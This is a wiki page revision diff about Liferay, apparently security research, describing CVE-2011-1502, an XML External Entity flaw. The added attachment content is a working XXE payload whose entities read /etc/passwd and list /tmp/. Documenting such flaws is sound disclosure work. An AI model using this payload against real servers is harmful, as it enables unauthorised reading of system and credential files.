Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 18.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:38
Change comment: Upload new attachment liferay-xee.xsl
To version Icon 19.1 Icon
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -24,5 +24,11 @@
24 24  
25 25  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
26 26  
27 -Reading /etc/passwd using CVE-2011-1502 :
27 +
28 +
29 +
30 +
31 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 +
33 +
28 28  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
Icon liferay-xee.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +184 bytes
Content
... ... @@ -1,0 +1,9 @@
1 +<!DOCTYPE doc [
2 +<!ENTITY boom1 SYSTEM "/etc/passwd">
3 +<!ENTITY boom2 SYSTEM "/tmp/">
4 +]>
5 +<doc>
6 +<response><file>&boom1;</file></response>
7 +<response><file>&boom2;</file></response>
8 +</doc>
9 +